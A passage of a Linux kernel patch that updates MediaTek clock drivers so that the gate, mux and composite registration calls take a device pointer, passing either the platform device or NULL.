+ 	clk_data = mtk_alloc_clk_data(CLK_PCIE_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, pcie_clks, ARRAY_SIZE(pcie_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, pcie_clks,
++			       ARRAY_SIZE(pcie_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index 01ee45fcd7e34..2019e272d1cd7 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -566,8 +566,9 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs),
+ 				 clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes),
+-				    base, &mt7629_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt7629_clk_lock, clk_data);
+ 
+ 	clk_prepare_enable(clk_data->hws[CLK_TOP_AXI_SEL]->clk);
+ 	clk_prepare_enable(clk_data->hws[CLK_TOP_MEM_SEL]->clk);
+@@ -585,8 +586,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	mtk_clk_register_cpumuxes(node, infra_muxes, ARRAY_SIZE(infra_muxes),
+ 				  clk_data);
+@@ -610,10 +611,11 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+-	mtk_clk_register_composites(peri_muxes, ARRAY_SIZE(peri_muxes), base,
++	mtk_clk_register_composites(&pdev->dev, peri_muxes,
++				    ARRAY_SIZE(peri_muxes), base,
+ 				    &mt7629_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -637,7 +639,7 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls),
+ 			      clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	clk_prepare_enable(clk_data->hws[CLK_APMIXED_ARMPLL]->clk);
+diff --git a/drivers/clk/mediatek/clk-mt7986-eth.c b/drivers/clk/mediatek/clk-mt7986-eth.c
+index c21e1d672384a..e04bc6845ea6d 100644
+--- a/drivers/clk/mediatek/clk-mt7986-eth.c
++++ b/drivers/clk/mediatek/clk-mt7986-eth.c
+@@ -72,8 +72,8 @@ static void __init mtk_sgmiisys_0_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(ARRAY_SIZE(sgmii0_clks));
+ 
+-	mtk_clk_register_gates(node, sgmii0_clks, ARRAY_SIZE(sgmii0_clks),
+-			       clk_data);
++	mtk_clk_register_gates(NULL, node, sgmii0_clks,
++			       ARRAY_SIZE(sgmii0_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -90,8 +90,8 @@ static void __init mtk_sgmiisys_1_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(ARRAY_SIZE(sgmii1_clks));
+ 
+-	mtk_clk_register_gates(node, sgmii1_clks, ARRAY_SIZE(sgmii1_clks),
+-			       clk_data);
++	mtk_clk_register_gates(NULL, node, sgmii1_clks,
++			       ARRAY_SIZE(sgmii1_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -109,7 +109,7 @@ static void __init mtk_ethsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(ARRAY_SIZE(eth_clks));
+ 
+-	mtk_clk_register_gates(node, eth_clks, ARRAY_SIZE(eth_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, eth_clks, ARRAY_SIZE(eth_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index 74e68a7197301..0a4bf87ee1607 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -178,10 +178,11 @@ static int clk_mt7986_infracfg_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	mtk_clk_register_factors(infra_divs, ARRAY_SIZE(infra_divs), clk_data);
+-	mtk_clk_register_muxes(infra_muxes, ARRAY_SIZE(infra_muxes), node,
++	mtk_clk_register_muxes(&pdev->dev, infra_muxes,
++			       ARRAY_SIZE(infra_muxes), node,
+ 			       &mt7986_clk_lock, clk_data);
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt7986-topckgen.c b/drivers/clk/mediatek/clk-mt7986-topckgen.c
+index de5121cf28774..c9bf47e6098fd 100644
+--- a/drivers/clk/mediatek/clk-mt7986-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt7986-topckgen.c
+@@ -303,7 +303,8 @@ static int clk_mt7986_topckgen_probe(struct platform_device *pdev)
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				    clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
+ 			       &mt7986_clk_lock, clk_data);
+ 
+ 	clk_prepare_enable(clk_data->hws[CLK_TOP_SYSAXI_SEL]->clk);
+diff --git a/drivers/clk/mediatek/clk-mt8135.c b/drivers/clk/mediatek/clk-mt8135.c
+index 3ea06d2ec2f11..a39ad58e27418 100644
+--- a/drivers/clk/mediatek/clk-mt8135.c
++++ b/drivers/clk/mediatek/clk-mt8135.c
+@@ -536,8 +536,9 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_factors(root_clk_alias, ARRAY_SIZE(root_clk_alias), clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-			&mt8135_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8135_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -553,8 +554,8 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -579,10 +580,11 @@ static void __init mtk_pericfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_gates, ARRAY_SIZE(peri_gates),
+-						clk_data);
+-	mtk_clk_register_composites(peri_clks, ARRAY_SIZE(peri_clks), base,
+-			&mt8135_clk_lock, clk_data);
++	mtk_clk_register_gates(NULL, node, peri_gates,
++			       ARRAY_SIZE(peri_gates), clk_data);
++	mtk_clk_register_composites(NULL, peri_clks,
++				    ARRAY_SIZE(peri_clks), base,
++				    &mt8135_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8167-aud.c b/drivers/clk/mediatek/clk-mt8167-aud.c
+index b5ac196cd9454..47a7d89d5777c 100644
+--- a/drivers/clk/mediatek/clk-mt8167-aud.c
++++ b/drivers/clk/mediatek/clk-mt8167-aud.c
+@@ -50,7 +50,7 @@ static void __init mtk_audsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUD_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8167-img.c b/drivers/clk/mediatek/clk-mt8167-img.c
+index 4e7c0772b4f99..e196b3b894a16 100644
+--- a/drivers/clk/mediatek/clk-mt8167-img.c
++++ b/drivers/clk/mediatek/clk-mt8167-img.c
+@@ -42,7 +42,7 @@ static void __init mtk_imgsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IMG_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, img_clks, ARRAY_SIZE(img_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, img_clks, ARRAY_SIZE(img_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+index 192714498b2ec..602d25f4cb2e2 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+@@ -40,7 +40,7 @@ static void __init mtk_mfgcfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MFG_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mfg_clks, ARRAY_SIZE(mfg_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, mfg_clks, ARRAY_SIZE(mfg_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167-mm.c b/drivers/clk/mediatek/clk-mt8167-mm.c
+index a94961b7b8cc6..abc70e1221bf9 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mm.c
++++ b/drivers/clk/mediatek/clk-mt8167-mm.c
+@@ -98,8 +98,8 @@ static int clk_mt8167_mm_probe(struct platform_device *pdev)
+ 
+ 	data = &mt8167_mmsys_driver_data;
+ 
+-	ret = mtk_clk_register_gates(node, data->gates_clk, data->gates_num,
+-				     clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, data->gates_clk,
++				     data->gates_num, clk_data);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167-vdec.c b/drivers/clk/mediatek/clk-mt8167-vdec.c
+index 38f0ba357d599..92bc05d997985 100644
+--- a/drivers/clk/mediatek/clk-mt8167-vdec.c
++++ b/drivers/clk/mediatek/clk-mt8167-vdec.c
+@@ -49,7 +49,8 @@ static void __init mtk_vdecsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VDEC_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, vdec_clks, ARRAY_SIZE(vdec_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, vdec_clks, ARRAY_SIZE(vdec_clks),
++			       clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8167.c b/drivers/clk/mediatek/clk-mt8167.c
+index f900ac4bf7b8d..91669ebafaf9b 100644
+--- a/drivers/clk/mediatek/clk-mt8167.c
++++ b/drivers/clk/mediatek/clk-mt8167.c
+@@ -937,11 +937,12 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks),
+ 				    clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, top_clks, ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-		&mt8167_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8167_clk_lock, clk_data);
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				base, &mt8167_clk_lock, clk_data);
+ 
+@@ -966,8 +967,9 @@ static void __init mtk_infracfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IFR_NR_CLK);
+ 
+-	mtk_clk_register_composites(ifr_muxes, ARRAY_SIZE(ifr_muxes), base,
+-		&mt8167_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, ifr_muxes,
++				    ARRAY_SIZE(ifr_muxes), base,
++				    &mt8167_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8173-mm.c b/drivers/clk/mediatek/clk-mt8173-mm.c
+index 5826eabdc9c77..444a3d58c8bf5 100644
+--- a/drivers/clk/mediatek/clk-mt8173-mm.c
++++ b/drivers/clk/mediatek/clk-mt8173-mm.c
+@@ -112,8 +112,8 @@ static int clk_mt8173_mm_probe(struct platform_device *pdev)
+ 
+ 	data = &mt8173_mmsys_driver_data;
+ 
+-	ret = mtk_clk_register_gates(node, data->gates_clk, data->gates_num,
+-				     clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, data->gates_clk,
++				     data->gates_num, clk_data);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8173.c b/drivers/clk/mediatek/clk-mt8173.c
+index b8529ee7199da..d05c1109b4f87 100644
+--- a/drivers/clk/mediatek/clk-mt8173.c
++++ b/drivers/clk/mediatek/clk-mt8173.c
+@@ -869,8 +869,9 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks), clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-			&mt8173_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8173_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -888,8 +889,8 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 	mtk_clk_register_factors(infra_divs, ARRAY_SIZE(infra_divs), clk_data);
+ 
+ 	mtk_clk_register_cpumuxes(node, cpu_muxes, ARRAY_SIZE(cpu_muxes),
+@@ -918,10 +919,11 @@ static void __init mtk_pericfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_gates, ARRAY_SIZE(peri_gates),
+-						clk_data);
+-	mtk_clk_register_composites(peri_clks, ARRAY_SIZE(peri_clks), base,
+-			&mt8173_clk_lock, clk_data);
++	mtk_clk_register_gates(NULL, node, peri_gates,
++			       ARRAY_SIZE(peri_gates), clk_data);
++	mtk_clk_register_composites(NULL, peri_clks,
++				    ARRAY_SIZE(peri_clks), base,
++				    &mt8173_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -1062,8 +1064,8 @@ static void __init mtk_imgsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IMG_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, img_clks, ARRAY_SIZE(img_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, img_clks,
++			       ARRAY_SIZE(img_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -1080,8 +1082,8 @@ static void __init mtk_vdecsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VDEC_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, vdec_clks, ARRAY_SIZE(vdec_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, vdec_clks,
++			       ARRAY_SIZE(vdec_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -1097,8 +1099,8 @@ static void __init mtk_vencsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VENC_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, venc_clks, ARRAY_SIZE(venc_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, venc_clks,
++			       ARRAY_SIZE(venc_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -1114,8 +1116,8 @@ static void __init mtk_vencltsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_VENCLT_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, venclt_clks, ARRAY_SIZE(venclt_clks),
+-						clk_data);
++	mtk_clk_register_gates(NULL, node, venclt_clks,
++			       ARRAY_SIZE(venclt_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8183-audio.c b/drivers/clk/mediatek/clk-mt8183-audio.c
+index b2d7746eddbed..f358a6e7a3408 100644
+--- a/drivers/clk/mediatek/clk-mt8183-audio.c
++++ b/drivers/clk/mediatek/clk-mt8183-audio.c
+@@ -75,8 +75,8 @@ static int clk_mt8183_audio_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUDIO_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, audio_clks, ARRAY_SIZE(audio_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, audio_clks,
++			       ARRAY_SIZE(audio_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8183-mm.c b/drivers/clk/mediatek/clk-mt8183-mm.c
+index 11ecc6fb0065b..3580315309132 100644
+--- a/drivers/clk/mediatek/clk-mt8183-mm.c
++++ b/drivers/clk/mediatek/clk-mt8183-mm.c
+@@ -90,8 +90,8 @@ static int clk_mt8183_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt8183.c b/drivers/clk/mediatek/clk-mt8183.c
+index 1860a35a723a5..78620244144e8 100644
+--- a/drivers/clk/mediatek/clk-mt8183.c
++++ b/drivers/clk/mediatek/clk-mt8183.c
+@@ -1172,8 +1172,8 @@ static int clk_mt8183_apmixed_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks, ARRAY_SIZE(apmixed_clks),
+-		clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
++			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -1238,17 +1238,20 @@ static int clk_mt8183_top_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
+ 
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes),
+-		node, &mt8183_clk_lock, top_clk_data);
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
++			       &mt8183_clk_lock, top_clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_muxes, ARRAY_SIZE(top_aud_muxes),
+-		base, &mt8183_clk_lock, top_clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_muxes,
++				    ARRAY_SIZE(top_aud_muxes), base,
++				    &mt8183_clk_lock, top_clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_divs, ARRAY_SIZE(top_aud_divs),
+-		base, &mt8183_clk_lock, top_clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_divs,
++				    ARRAY_SIZE(top_aud_divs), base,
++				    &mt8183_clk_lock, top_clk_data);
+ 
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-		top_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), top_clk_data);
+ 
+ 	ret = clk_mt8183_reg_mfg_mux_notifier(&pdev->dev,
+ 					      top_clk_data->hws[CLK_TOP_MUX_MFG]->clk);
+@@ -1267,8 +1270,8 @@ static int clk_mt8183_infra_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-		clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+@@ -1290,8 +1293,8 @@ static int clk_mt8183_peri_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -1308,8 +1311,9 @@ static int clk_mt8183_mcu_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MCU_NR_CLK);
+ 
+-	mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes), base,
+-			&mt8183_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++				    ARRAY_SIZE(mcu_muxes), base,
++				    &mt8183_clk_lock, clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt8186-mcu.c b/drivers/clk/mediatek/clk-mt8186-mcu.c
+index dfc305c1fc5d8..e52a2d986c99c 100644
+--- a/drivers/clk/mediatek/clk-mt8186-mcu.c
++++ b/drivers/clk/mediatek/clk-mt8186-mcu.c
+@@ -65,7 +65,8 @@ static int clk_mt8186_mcu_probe(struct platform_device *pdev)
+ 		goto free_mcu_data;
+ 	}
+ 
+-	r = mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes), base,
++	r = mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++					ARRAY_SIZE(mcu_muxes), base,
+ 					NULL, clk_data);
+ 	if (r)
+ 		goto free_mcu_data;
+diff --git a/drivers/clk/mediatek/clk-mt8186-mm.c b/drivers/clk/mediatek/clk-mt8186-mm.c
+index 1d33be4079470..0b72607777fa1 100644
+--- a/drivers/clk/mediatek/clk-mt8186-mm.c
++++ b/drivers/clk/mediatek/clk-mt8186-mm.c
+@@ -69,7 +69,8 @@ static int clk_mt8186_mm_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++				   ARRAY_SIZE(mm_clks), clk_data);
+ 	if (r)
+ 		goto free_mm_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8186-topckgen.c b/drivers/clk/mediatek/clk-mt8186-topckgen.c
+index d7f2c4663c853..70b6e008a188b 100644
+--- a/drivers/clk/mediatek/clk-mt8186-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt8186-topckgen.c
+@@ -715,17 +715,20 @@ static int clk_mt8186_topck_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto unregister_fixed_clks;
+ 
+-	r = mtk_clk_register_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), node,
++	r = mtk_clk_register_muxes(&pdev->dev, top_mtk_muxes,
++				   ARRAY_SIZE(top_mtk_muxes), node,
+ 				   &mt8186_clk_lock, clk_data);
+ 	if (r)
+ 		goto unregister_factors;
+ 
+-	r = mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
++	r = mtk_clk_register_composites(&pdev->dev, top_muxes,
++					ARRAY_SIZE(top_muxes), base,
+ 					&mt8186_clk_lock, clk_data);
+ 	if (r)
+ 		goto unregister_muxes;
+ 
+-	r = mtk_clk_register_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), base,
++	r = mtk_clk_register_composites(&pdev->dev, top_adj_divs,
++					ARRAY_SIZE(top_adj_divs), base,
+ 					&mt8186_clk_lock, clk_data);
+ 	if (r)
+ 		goto unregister_composite_muxes;
+diff --git a/drivers/clk/mediatek/clk-mt8192-aud.c b/drivers/clk/mediatek/clk-mt8192-aud.c
+index 8c989bffd8c72..f524188fe4c2d 100644
+--- a/drivers/clk/mediatek/clk-mt8192-aud.c
++++ b/drivers/clk/mediatek/clk-mt8192-aud.c
+@@ -87,7 +87,8 @@ static int clk_mt8192_aud_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, aud_clks,
++				   ARRAY_SIZE(aud_clks), clk_data);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8192-mm.c b/drivers/clk/mediatek/clk-mt8192-mm.c
+index 1be3ff4d407db..e9eb4cf8349ac 100644
+--- a/drivers/clk/mediatek/clk-mt8192-mm.c
++++ b/drivers/clk/mediatek/clk-mt8192-mm.c
+@@ -91,7 +91,8 @@ static int clk_mt8192_mm_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8192.c b/drivers/clk/mediatek/clk-mt8192.c
+index d0f2269310706..16feb86dcb1b8 100644
+--- a/drivers/clk/mediatek/clk-mt8192.c
++++ b/drivers/clk/mediatek/clk-mt8192.c
+@@ -1100,27 +1100,68 @@ static int clk_mt8192_top_probe(struct platform_device *pdev)
+ 	if (IS_ERR(base))
+ 		return PTR_ERR(base);
+ 
+-	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks), top_clk_data);
+-	mtk_clk_register_factors(top_early_divs, ARRAY_SIZE(top_early_divs), top_clk_data);
+-	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
+-	mtk_clk_register_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), node, &mt8192_clk_lock,
+-			       top_clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base, &mt8192_clk_lock,
+-				    top_clk_data);
